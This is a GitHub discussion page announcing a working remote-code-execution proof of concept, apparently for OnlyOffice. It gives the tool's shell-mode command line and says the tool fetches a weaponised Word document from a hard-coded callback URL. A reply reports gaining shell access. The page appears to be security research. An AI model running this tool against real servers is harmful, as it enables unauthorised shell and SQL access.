RCE PoC now working #14
strawp
announced in
Announcements
Replies: 1 comment 3 replies
-
|
I can confirm that I was able to get SHELL access and created issue 54819 in our private issue tracker to discuss this problem |
Beta Was this translation helpful? Give feedback.
3 replies
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Uh oh!
There was an error while loading. Please reload this page.
-
RCE is now demonstrable using the "shell" command, e.g.
./pwnlyoffice.py -u https://localhost shellCurrently this requires a callback URL to download a weaponised Word doc, the URL of which is hard coded to http://172.17.0.1:8000/backdoor.docx. You can edit this if you're not testing in Docker. This also allows SQL commands to be run.
Beta Was this translation helpful? Give feedback.
All reactions